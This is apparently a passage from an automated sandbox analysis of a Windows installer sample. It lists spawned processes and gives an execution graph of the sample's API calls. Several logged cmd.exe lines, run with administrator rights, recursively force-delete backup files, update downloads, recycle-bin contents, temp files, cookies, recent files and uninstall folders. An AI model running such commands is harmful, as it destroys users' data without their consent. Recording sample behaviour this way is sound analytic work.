                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              General

                              Target ID:99
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:100
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:101
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              General

                              Target ID:102
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:103
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              General

                              Target ID:104
                              Start time:03:16:06
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:105
                              Start time:03:16:06
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:106
                              Start time:03:16:06
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:107
                              Start time:03:16:06
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              General

                              Target ID:108
                              Start time:03:16:06
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:11.8%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:23%
                                Total number of Nodes:1226
                                Total number of Limit Nodes:22
                                execution_graph 2877 401dc1 2889 4029f6 2877->2889 2880 4029f6 18 API calls 2881 401dd0 2880->2881 2882 4029f6 18 API calls 2881->2882 2883 401dd9 2882->2883 2884 4029f6 18 API calls 2883->2884 2885 401de2 2884->2885 2895 401423 2885->2895 2888 401e16 2890 402a02 2889->2890 2898 4059ff 2890->2898 2893 401dc7 2893->2880 2938 404d7b 2895->2938 2910 405a0c 2898->2910 2899 405c26 2900 402a23 2899->2900 2933 4059dd lstrcpynA 2899->2933 2900->2893 2917 405c3f 2900->2917 2902 405aa4 GetVersion 2913 405ab1 2902->2913 2903 405bfd lstrlenA 2903->2910 2906 4059ff 10 API calls 2906->2903 2908 405b1c GetSystemDirectoryA 2908->2913 2909 405b2f GetWindowsDirectoryA 2909->2913 2910->2899 2910->2902 2910->2903 2910->2906 2911 405c3f 5 API calls 2910->2911 2931 40593b wsprintfA 2910->2931 2932 4059dd lstrcpynA 2910->2932 2911->2910 2912 405b63 SHGetSpecialFolderLocation 2912->2913 2916 405b7b SHGetPathFromIDListA CoTaskMemFree 2912->2916 2913->2908 2913->2909 2913->2910 2913->2912 2914 4059ff 10 API calls 2913->2914 2915 405ba6 lstrcatA 2913->2915 2926 4058c4 RegOpenKeyExA 2913->2926 2914->2913 2915->2910 2916->2913 2918 405c4b 2917->2918 2920 405cb3 2918->2920 2921 405ca8 CharNextA 2918->2921 2924 405c96 CharNextA 2918->2924 2925 405ca3 CharNextA 2918->2925 2934 4054fb 2918->2934 2919 405cb7 CharPrevA 2919->2920 2920->2919 2922 405cd2 2920->2922 2921->2918 2921->2920 2922->2893 2924->2918 2925->2921 2927 405935 2926->2927 2928 4058f7 RegQueryValueExA 2926->2928 2927->2913 2929 405918 RegCloseKey 2928->2929 2929->2927 2931->2910 2932->2910 2933->2900 2935 405501 2934->2935 2936 405514 2935->2936 2937 405507 CharNextA 2935->2937 2936->2918 2937->2935 2939 404d96 2938->2939 2948 401431 ShellExecuteA 2938->2948 2940 404db3 lstrlenA 2939->2940 2941 4059ff 18 API calls 2939->2941 2942 404dc1 lstrlenA 2940->2942 2943 404ddc 2940->2943 2941->2940 2944 404dd3 lstrcatA 2942->2944 2942->2948 2945 404de2 SetWindowTextA 2943->2945 2946 404def 2943->2946 2944->2943 2945->2946 2947 404df5 SendMessageA SendMessageA SendMessageA 2946->2947 2946->2948 2947->2948 2948->2888 3398 401cc1 GetDlgItem GetClientRect 3399 4029f6 18 API calls 3398->3399 3400 401cf1 LoadImageA SendMessageA 3399->3400 3401 401d0f DeleteObject 3400->3401 3402 40288b 3400->3402 3401->3402 3403 401645 3404 4029f6 18 API calls 3403->3404 3405 40164c 3404->3405 3406 4029f6 18 API calls 3405->3406 3407 401655 3406->3407 3408 4029f6 18 API calls 3407->3408 3409 40165e MoveFileA 3408->3409 3410 401671 3409->3410 3411 40166a 3409->3411 3412 405cd8 2 API calls 3410->3412 3415 402169 3410->3415 3413 401423 25 API calls 3411->3413 3414 401680 3412->3414 3413->3415 3414->3415 3416 40572b 38 API calls 3414->3416 3416->3411 3417 401ec5 3418 4029f6 18 API calls 3417->3418 3419 401ecc GetFileVersionInfoSizeA 3418->3419 3420 401eef GlobalAlloc 3419->3420 3423 401f45 3419->3423 3421 401f03 GetFileVersionInfoA 3420->3421 3420->3423 3422 401f14 VerQueryValueA 3421->3422 3421->3423 3422->3423 3424 401f2d 3422->3424 3428 40593b wsprintfA 3424->3428 3426 401f39 3429 40593b wsprintfA 3426->3429 3428->3426 3429->3423 3437 4046ca GetDlgItem GetDlgItem 3438 40471e 7 API calls 3437->3438 3451 40493b 3437->3451 3439 4047c4 DeleteObject 3438->3439 3440 4047b7 SendMessageA 3438->3440 3441 4047cf 3439->3441 3440->3439 3443 404806 3441->3443 3445 4059ff 18 API calls 3441->3445 3442 404a25 3444 404ad4 3442->3444 3447 40492e 3442->3447 3453 404a7e SendMessageA 3442->3453 3488 403d8f 3443->3488 3448 404ae9 3444->3448 3449 404add SendMessageA 3444->3449 3450 4047e8 SendMessageA SendMessageA 3445->3450 3506 403df6 3447->3506 3461 404b02 3448->3461 3462 404afb ImageList_Destroy 3448->3462 3466 404b12 3448->3466 3449->3448 3450->3441 3451->3442 3469 4049af 3451->3469 3493 40464a SendMessageA 3451->3493 3452 40481a 3457 403d8f 19 API calls 3452->3457 3453->3447 3459 404a93 SendMessageA 3453->3459 3455 404a17 SendMessageA 3455->3442 3470 404828 3457->3470 3458 404c78 3458->3447 3467 404c8a ShowWindow GetDlgItem ShowWindow 3458->3467 3464 404aa6 3459->3464 3465 404b0b GlobalFree 3461->3465 3461->3466 3462->3461 3463 4048fc GetWindowLongA SetWindowLongA 3468 404915 3463->3468 3476 404ab7 SendMessageA 3464->3476 3465->3466 3466->3458 3475 40140b 2 API calls 3466->3475 3481 404b44 3466->3481 3467->3447 3471 404933 3468->3471 3472 40491b ShowWindow 3468->3472 3469->3442 3469->3455 3470->3463 3474 404877 SendMessageA 3470->3474 3477 4048f6 3470->3477 3479 4048b3 SendMessageA 3470->3479 3480 4048c4 SendMessageA 3470->3480 3492 403dc4 SendMessageA 3471->3492 3491 403dc4 SendMessageA 3472->3491 3474->3470 3475->3481 3476->3444 3477->3463 3477->3468 3479->3470 3480->3470 3482 404b88 3481->3482 3485 404b72 SendMessageA 3481->3485 3483 404c4e InvalidateRect 3482->3483 3487 404bfc SendMessageA SendMessageA 3482->3487 3483->3458 3484 404c64 3483->3484 3498 404568 3484->3498 3485->3482 3487->3482 3489 4059ff 18 API calls 3488->3489 3490 403d9a SetDlgItemTextA 3489->3490 3490->3452 3491->3447 3492->3451 3494 4046a9 SendMessageA 3493->3494 3495 40466d GetMessagePos ScreenToClient SendMessageA 3493->3495 3496 4046a1 3494->3496 3495->3496 3497 4046a6 3495->3497 3496->3469 3497->3494 3499 404582 3498->3499 3500 4059ff 18 API calls 3499->3500 3501 4045b7 3500->3501 3502 4059ff 18 API calls 3501->3502 3503 4045c2 3502->3503 3504 4059ff 18 API calls 3503->3504 3505 4045f3 lstrlenA wsprintfA SetDlgItemTextA 3504->3505 3505->3458 3507 403e0e GetWindowLongA 3506->3507 3517 403e97 3506->3517 3508 403e1f 3507->3508 3507->3517 3509 403e31 3508->3509 3510 403e2e GetSysColor 3508->3510 3511 403e41 SetBkMode 3509->3511 3512 403e37 SetTextColor 3509->3512 3510->3509 3513 403e59 GetSysColor 3511->3513 3514 403e5f 3511->3514 3512->3511 3513->3514 3515 403e70 3514->3515 3516 403e66 SetBkColor 3514->3516 3515->3517 3518 403e83 DeleteObject 3515->3518 3519 403e8a CreateBrushIndirect 3515->3519 3516->3515 3518->3519 3519->3517 3065 4030cb #17 SetErrorMode OleInitialize 3135 405cff GetModuleHandleA 3065->3135 3069 403139 GetCommandLineA 3140 4059dd lstrcpynA 3069->3140 3071 40314b GetModuleHandleA 3072 403162 3071->3072 3073 4054fb CharNextA 3072->3073 3074 403176 CharNextA 3073->3074 3080 403183 3074->3080 3075 4031ec 3076 4031ff GetTempPathA 3075->3076 3141 403097 3076->3141 3078 403215 3081 403239 DeleteFileA 3078->3081 3082 403219 GetWindowsDirectoryA lstrcatA 3078->3082 3079 4054fb CharNextA 3079->3080 3080->3075 3080->3079 3086 4031ee 3080->3086 3149 402c22 GetTickCount GetModuleFileNameA 3081->3149 3084 403097 11 API calls 3082->3084 3085 403235 3084->3085 3085->3081 3088 4032b7 ExitProcess CoUninitialize 3085->3088 3232 4059dd lstrcpynA 3086->3232 3087 40324a 3087->3088 3090 4032a3 3087->3090 3095 4054fb CharNextA 3087->3095 3091 4033b1 3088->3091 3092 4032cc 3088->3092 3177 403526 3090->3177 3093 403434 ExitProcess 3091->3093 3097 405cff 3 API calls 3091->3097 3096 40529e MessageBoxIndirectA 3092->3096 3100 403261 3095->3100 3101 4032da ExitProcess 3096->3101 3102 4033c0 3097->3102 3105 4032e2 lstrcatA lstrcmpiA 3100->3105 3106 40327e 3100->3106 3103 405cff 3 API calls 3102->3103 3104 4033c9 3103->3104 3107 405cff 3 API calls 3104->3107 3105->3088 3108 4032fe CreateDirectoryA SetCurrentDirectoryA 3105->3108 3233 4055b1 3106->3233 3110 4033d2 3107->3110 3111 403320 3108->3111 3112 403315 3108->3112 3115 403420 ExitWindowsEx 3110->3115 3121 4033e0 GetCurrentProcess 3110->3121 3251 4059dd lstrcpynA 3111->3251 3250 4059dd lstrcpynA 3112->3250 3115->3093 3118 40342d 3115->3118 3281 40140b 3118->3281 3119 403298 3249 4059dd lstrcpynA 3119->3249 3125 4033f0 3121->3125 3123 4059ff 18 API calls 3124 403350 DeleteFileA 3123->3124 3126 40335d CopyFileA 3124->3126 3132 40332e 3124->3132 3125->3115 3126->3132 3127 4033a5 3128 40572b 38 API calls 3127->3128 3130 4033ac 3128->3130 3130->3088 3131 4059ff 18 API calls 3131->3132 3132->3123 3132->3127 3132->3131 3134 403391 CloseHandle 3132->3134 3252 40572b 3132->3252 3278 40523d CreateProcessA 3132->3278 3134->3132 3136 405d26 GetProcAddress 3135->3136 3137 405d1b LoadLibraryA 3135->3137 3138 40310e SHGetFileInfoA 3136->3138 3137->3136 3137->3138 3139 4059dd lstrcpynA 3138->3139 3139->3069 3140->3071 3142 405c3f 5 API calls 3141->3142 3143 4030a3 3142->3143 3144 4030ad 3143->3144 3145 4054d0 3 API calls 3143->3145 3144->3078 3146 4030b5 CreateDirectoryA 3145->3146 3284 4056e3 3146->3284 3288 4056b4 GetFileAttributesA CreateFileA 3149->3288 3151 402c62 3172 402c72 3151->3172 3289 4059dd lstrcpynA 3151->3289 3153 402c88 3290 405517 lstrlenA 3153->3290 3157 402c99 GetFileSize 3158 402d95 3157->3158 3170 402cb0 3157->3170 3295 402bbe 3158->3295 3160 402d9e 3162 402dce GlobalAlloc 3160->3162 3160->3172 3307 403080 SetFilePointer 3160->3307 3161 40304e ReadFile 3161->3170 3306 403080 SetFilePointer 3162->3306 3164 402e01 3168 402bbe 6 API calls 3164->3168 3166 402db7 3169 40304e ReadFile 3166->3169 3167 402de9 3171 402e5b 37 API calls 3167->3171 3168->3172 3173 402dc2 3169->3173 3170->3158 3170->3161 3170->3164 3170->3172 3174 402bbe 6 API calls 3170->3174 3175 402df5 3171->3175 3172->3087 3173->3162 3173->3172 3174->3170 3175->3172 3175->3175 3176 402e32 SetFilePointer 3175->3176 3176->3172 3178 405cff 3 API calls 3177->3178 3179 40353a 3178->3179 3180 403552 3179->3180 3182 403540 3179->3182 3181 4058c4 3 API calls 3180->3181 3183 403573 3181->3183 3321 40593b wsprintfA 3182->3321 3185 403591 lstrcatA 3183->3185 3187 4058c4 3 API calls 3183->3187 3186 403550 3185->3186 3312 4037ef 3186->3312 3187->3185 3190 4055b1 18 API calls 3191 4035c3 3190->3191 3192 40364c 3191->3192 3194 4058c4 3 API calls 3191->3194 3193 4055b1 18 API calls 3192->3193 3195 403652 3193->3195 3196 4035ef 3194->3196 3197 403662 LoadImageA 3195->3197 3198 4059ff 18 API calls 3195->3198 3196->3192 3201 40360b lstrlenA 3196->3201 3205 4054fb CharNextA 3196->3205 3199 403716 3197->3199 3200 40368d RegisterClassA 3197->3200 3198->3197 3204 40140b 2 API calls 3199->3204 3202 4032b3 3200->3202 3203 4036c9 SystemParametersInfoA CreateWindowExA 3200->3203 3206 403619 lstrcmpiA 3201->3206 3207 40363f 3201->3207 3202->3088 3203->3199 3208 40371c 3204->3208 3210 403609 3205->3210 3206->3207 3211 403629 GetFileAttributesA 3206->3211 3209 4054d0 3 API calls 3207->3209 3208->3202 3212 4037ef 19 API calls 3208->3212 3213 403645 3209->3213 3210->3201 3214 403635 3211->3214 3215 40372d 3212->3215 3322 4059dd lstrcpynA 3213->3322 3214->3207 3217 405517 2 API calls 3214->3217 3218 403739 ShowWindow LoadLibraryA 3215->3218 3219 4037bc 3215->3219 3217->3207 3220 403758 LoadLibraryA 3218->3220 3221 40375f GetClassInfoA 3218->3221 3323 404e4d OleInitialize 3219->3323 3220->3221 3223 403773 GetClassInfoA RegisterClassA 3221->3223 3224 403789 DialogBoxParamA 3221->3224 3223->3224 3226 40140b 2 API calls 3224->3226 3225 4037c2 3227 4037c6 3225->3227 3228 4037de 3225->3228 3231 4037b1 3226->3231 3227->3202 3230 40140b 2 API calls 3227->3230 3229 40140b 2 API calls 3228->3229 3229->3202 3230->3202 3231->3202 3232->3076 3338 4059dd lstrcpynA 3233->3338 3235 4055c2 3236 405564 4 API calls 3235->3236 3237 4055c8 3236->3237 3238 403289 3237->3238 3239 405c3f 5 API calls 3237->3239 3238->3088 3248 4059dd lstrcpynA 3238->3248 3240 4055d8 3239->3240 3240->3238 3245 4055eb 3240->3245 3241 405603 lstrlenA 3242 40560e 3241->3242 3241->3245 3244 4054d0 3 API calls 3242->3244 3243 405cd8 2 API calls 3243->3245 3246 405613 GetFileAttributesA 3244->3246 3245->3238 3245->3241 3245->3243 3247 405517 2 API calls 3245->3247 3246->3238 3247->3241 3248->3119 3249->3090 3250->3111 3251->3132 3253 405cff 3 API calls 3252->3253 3254 405736 3253->3254 3255 405793 GetShortPathNameA 3254->3255 3257 405888 3254->3257 3339 4056b4 GetFileAttributesA CreateFileA 3254->3339 3256 4057a8 3255->3256 3255->3257 3256->3257 3259 4057b0 wsprintfA 3256->3259 3257->3132 3262 4059ff 18 API calls 3259->3262 3260 405777 CloseHandle GetShortPathNameA 3260->3257 3261 40578b 3260->3261 3261->3255 3261->3257 3263 4057d8 3262->3263 3340 4056b4 GetFileAttributesA CreateFileA 3263->3340 3265 4057e5 3265->3257 3266 4057f4 GetFileSize GlobalAlloc 3265->3266 3267 405881 CloseHandle 3266->3267 3268 405812 ReadFile 3266->3268 3267->3257 3268->3267 3269 405826 3268->3269 3269->3267 3341 405629 lstrlenA 3269->3341 3272 405895 3274 405629 4 API calls 3272->3274 3273 40583b 3346 4059dd lstrcpynA 3273->3346 3276 405849 3274->3276 3277 40585c SetFilePointer WriteFile GlobalFree 3276->3277 3277->3267 3279 405278 3278->3279 3280 40526c CloseHandle 3278->3280 3279->3132 3280->3279 3282 401389 2 API calls 3281->3282 3283 401420 3282->3283 3283->3093 3285 4056ee GetTickCount GetTempFileNameA 3284->3285 3286 4030c9 3285->3286 3287 40571a 3285->3287 3286->3078 3287->3285 3287->3286 3288->3151 3289->3153 3291 405524 3290->3291 3292 402c8e 3291->3292 3293 405529 CharPrevA 3291->3293 3294 4059dd lstrcpynA 3292->3294 3293->3291 3293->3292 3294->3157 3296 402bc7 3295->3296 3297 402bdf 3295->3297 3300 402bd0 DestroyWindow 3296->3300 3301 402bd7 3296->3301 3298 402be7 3297->3298 3299 402bef GetTickCount 3297->3299 3308 405d38 3298->3308 3303 402c20 3299->3303 3304 402bfd CreateDialogParamA ShowWindow 3299->3304 3300->3301 3301->3160 3303->3160 3304->3303 3306->3167 3307->3166 3309 405d55 PeekMessageA 3308->3309 3310 402bed 3309->3310 3311 405d4b DispatchMessageA 3309->3311 3310->3160 3311->3309 3313 403803 3312->3313 3330 40593b wsprintfA 3313->3330 3315 403874 3316 4059ff 18 API calls 3315->3316 3317 403880 SetWindowTextA 3316->3317 3318 4035a1 3317->3318 3319 40389c 3317->3319 3318->3190 3319->3318 3320 4059ff 18 API calls 3319->3320 3320->3319 3321->3186 3322->3192 3331 403ddb 3323->3331 3325 404e97 3326 403ddb SendMessageA 3325->3326 3328 404ea9 OleUninitialize 3326->3328 3327 404e70 3327->3325 3334 401389 3327->3334 3328->3225 3330->3315 3332 403df3 3331->3332 3333 403de4 SendMessageA 3331->3333 3332->3327 3333->3332 3336 401390 3334->3336 3335 4013fe 3335->3327 3336->3335 3337 4013cb MulDiv SendMessageA 3336->3337 3337->3336 3338->3235 3339->3260 3340->3265 3342 40565f lstrlenA 3341->3342 3343 405669 3342->3343 3344 40563d lstrcmpiA 3342->3344 3343->3272 3343->3273 3344->3343 3345 405656 CharNextA 3344->3345 3345->3342 3346->3276 3523 404ccb 3524 404cf0 3523->3524 3525 404cd9 3523->3525 3527 404cfe IsWindowVisible 3524->3527 3533 404d15 3524->3533 3526 404cdf 3525->3526 3541 404d59 3525->3541 3530 403ddb SendMessageA 3526->3530 3529 404d0b 3527->3529 3527->3541 3528 404d5f CallWindowProcA 3531 404ce9 3528->3531 3532 40464a 5 API calls 3529->3532 3530->3531 3532->3533 3533->3528 3542 4059dd lstrcpynA 3533->3542 3535 404d44 3543 40593b wsprintfA 3535->3543 3537 404d4b 3538 40140b 2 API calls 3537->3538 3539 404d52 3538->3539 3544 4059dd lstrcpynA 3539->3544 3541->3528 3542->3535 3543->3537 3544->3541 3347 40344c 3348 403464 3347->3348 3349 403456 CloseHandle 3347->3349 3354 403491 3348->3354 3349->3348 3355 40349f 3354->3355 3356 403469 3355->3356 3357 4034a4 FreeLibrary GlobalFree 3355->3357 3358 405302 3356->3358 3357->3356 3357->3357 3359 4055b1 18 API calls 3358->3359 3360 405316 3359->3360 3361 405336 3360->3361 3362 40531f DeleteFileA 3360->3362 3363 40546b 3361->3363 3396 4059dd lstrcpynA 3361->3396 3392 403475 3362->3392 3368 405cd8 2 API calls 3363->3368 3363->3392 3365 405360 3366 405371 3365->3366 3367 405364 lstrcatA 3365->3367 3370 405517 2 API calls 3366->3370 3369 405377 3367->3369 3371 405490 3368->3371 3372 405385 lstrcatA 3369->3372 3373 405390 lstrlenA FindFirstFileA 3369->3373 3370->3369 3374 4054d0 3 API calls 3371->3374 3371->3392 3372->3373 3373->3363 3386 4053b4 3373->3386 3376 40549a 3374->3376 3375 4054fb CharNextA 3375->3386 3377 405695 2 API calls 3376->3377 3378 4054a0 RemoveDirectoryA 3377->3378 3379 4054c2 3378->3379 3380 4054ab 3378->3380 3381 404d7b 25 API calls 3379->3381 3385 404d7b 25 API calls 3380->3385 3380->3392 3381->3392 3382 40544a FindNextFileA 3384 405462 FindClose 3382->3384 3382->3386 3384->3363 3387 4054b9 3385->3387 3386->3375 3386->3382 3388 405695 2 API calls 3386->3388 3391 405302 59 API calls 3386->3391 3393 404d7b 25 API calls 3386->3393 3394 404d7b 25 API calls 3386->3394 3395 40572b 38 API calls 3386->3395 3397 4059dd lstrcpynA 3386->3397 3389 40572b 38 API calls 3387->3389 3390 405417 DeleteFileA 3388->3390 3389->3392 3390->3386 3391->3386 3393->3382 3394->3386 3395->3386 3396->3365 3397->3386 3545 4025cc 3546 4025d3 3545->3546 3547 402838 3545->3547 3553 4029d9 3546->3553 3549 4025de 3550 4025e5 SetFilePointer 3549->3550 3550->3547 3551 4025f5 3550->3551 3556 40593b wsprintfA 3551->3556 3554 4059ff 18 API calls 3553->3554 3555 4029ed 3554->3555 3555->3549 3556->3547 3557 4041cd 3558 40420b 3557->3558 3559 4041fe 3557->3559 3560 404214 GetDlgItem 3558->3560 3567 404277 3558->3567 3618 405282 GetDlgItemTextA 3559->3618 3562 404228 3560->3562 3566 40423c SetWindowTextA 3562->3566 3570 405564 4 API calls 3562->3570 3563 40435b 3615 4044e7 3563->3615 3620 405282 GetDlgItemTextA 3563->3620 3564 404205 3565 405c3f 5 API calls 3564->3565 3565->3558 3571 403d8f 19 API calls 3566->3571 3567->3563 3572 4059ff 18 API calls 3567->3572 3567->3615 3569 403df6 8 API calls 3574 4044fb 3569->3574 3575 404232 3570->3575 3576 40425a 3571->3576 3577 4042ed SHBrowseForFolderA 3572->3577 3573 404387 3578 4055b1 18 API calls 3573->3578 3575->3566 3582 4054d0 3 API calls 3575->3582 3579 403d8f 19 API calls 3576->3579 3577->3563 3580 404305 CoTaskMemFree 3577->3580 3581 40438d 3578->3581 3583 404268 3579->3583 3584 4054d0 3 API calls 3580->3584 3621 4059dd lstrcpynA 3581->3621 3582->3566 3619 403dc4 SendMessageA 3583->3619 3586 404312 3584->3586 3590 404349 SetDlgItemTextA 3586->3590 3593 4059ff 18 API calls 3586->3593 3588 4043a4 3592 405cff 3 API calls 3588->3592 3589 404270 3591 405cff 3 API calls 3589->3591 3590->3563 3591->3567 3600 4043ac 3592->3600 3594 404331 lstrcmpiA 3593->3594 3594->3590 3596 404342 lstrcatA 3594->3596 3595 4043e6 3622 4059dd lstrcpynA 3595->3622 3596->3590 3598 4043ef 3599 405564 4 API calls 3598->3599 3601 4043f5 GetDiskFreeSpaceA 3599->3601 3600->3595 3604 405517 2 API calls 3600->3604 3605 404439 3600->3605 3603 404417 MulDiv 3601->3603 3601->3605 3603->3605 3604->3600 3606 404496 3605->3606 3608 404568 21 API calls 3605->3608 3607 4044b9 3606->3607 3610 40140b 2 API calls 3606->3610 3623 403db1 EnableWindow 3607->3623 3609 404488 3608->3609 3611 404498 SetDlgItemTextA 3609->3611 3612 40448d 3609->3612 3610->3607 3611->3606 3614 404568 21 API calls 3612->3614 3614->3606 3615->3569 3616 4044d5 3616->3615 3624 404162 3616->3624 3618->3564 3619->3589 3620->3573 3621->3588 3622->3598 3623->3616 3625 404170 3624->3625 3626 404175 SendMessageA 3624->3626 3625->3626 3626->3615 3627 401f51 3628 401f63 3627->3628 3629 402012 3627->3629 3630 4029f6 18 API calls 3628->3630 3632 401423 25 API calls 3629->3632 3631 401f6a 3630->3631 3633 4029f6 18 API calls 3631->3633 3637 402169 3632->3637 3634 401f73 3633->3634 3635 401f88 LoadLibraryExA 3634->3635 3636 401f7b GetModuleHandleA 3634->3636 3635->3629 3638 401f98 GetProcAddress 3635->3638 3636->3635 3636->3638 3639 401fe5 3638->3639 3640 401fa8 3638->3640 3641 404d7b 25 API calls 3639->3641 3642 401423 25 API calls 3640->3642 3643 401fb8 3640->3643 3641->3643 3642->3643 3643->3637 3644 402006 FreeLibrary 3643->3644 3644->3637 3645 4014d6 3646 4029d9 18 API calls 3645->3646 3647 4014dc Sleep 3646->3647 3649 40288b 3647->3649 3650 403ed7 3651 403ffa 3650->3651 3652 403eed 3650->3652 3653 404069 3651->3653 3656 40413d 3651->3656 3662 40403e GetDlgItem SendMessageA 3651->3662 3654 403d8f 19 API calls 3652->3654 3655 404073 GetDlgItem 3653->3655 3653->3656 3657 403f43 3654->3657 3660 404089 3655->3660 3661 4040fb 3655->3661 3659 403df6 8 API calls 3656->3659 3658 403d8f 19 API calls 3657->3658 3664 403f50 CheckDlgButton 3658->3664 3665 404138 3659->3665 3660->3661 3666 4040af 6 API calls 3660->3666 3661->3656 3667 40410d 3661->3667 3681 403db1 EnableWindow 3662->3681 3679 403db1 EnableWindow 3664->3679 3666->3661 3670 404113 SendMessageA 3667->3670 3671 404124 3667->3671 3668 404064 3672 404162 SendMessageA 3668->3672 3670->3671 3671->3665 3674 40412a SendMessageA 3671->3674 3672->3653 3673 403f6e GetDlgItem 3680 403dc4 SendMessageA 3673->3680 3674->3665 3676 403f84 SendMessageA 3677 403fa2 GetSysColor 3676->3677 3678 403fab SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3676->3678 3677->3678 3678->3665 3679->3673 3680->3676 3681->3668 3687 4018d8 3688 40190f 3687->3688 3689 4029f6 18 API calls 3688->3689 3690 401914 3689->3690 3691 405302 68 API calls 3690->3691 3692 40191d 3691->3692 3693 4018db 3694 4029f6 18 API calls 3693->3694 3695 4018e2 3694->3695 3696 40529e MessageBoxIndirectA 3695->3696 3697 4018eb 3696->3697 3712 4034e4 3713 4034ef 3712->3713 3714 4034f6 GlobalAlloc 3713->3714 3715 4034f3 3713->3715 3714->3715 3723 401ae5 3724 4029f6 18 API calls 3723->3724 3725 401aec 3724->3725 3726 4029d9 18 API calls 3725->3726 3727 401af5 wsprintfA 3726->3727 3728 40288b 3727->3728 3729 402866 SendMessageA 3730 402880 InvalidateRect 3729->3730 3731 40288b 3729->3731 3730->3731 3732 4019e6 3733 4029f6 18 API calls 3732->3733 3734 4019ef ExpandEnvironmentStringsA 3733->3734 3735 401a03 3734->3735 3737 401a16 3734->3737 3736 401a08 lstrcmpA 3735->3736 3735->3737 3736->3737 3738 402267 3739 4029f6 18 API calls 3738->3739 3740 402275 3739->3740 3741 4029f6 18 API calls 3740->3741 3742 40227e 3741->3742 3743 4029f6 18 API calls 3742->3743 3744 402288 GetPrivateProfileStringA 3743->3744 3745 401c6d 3746 4029d9 18 API calls 3745->3746 3747 401c73 IsWindow 3746->3747 3748 4019d6 3747->3748 3749 4014f0 SetForegroundWindow 3750 40288b 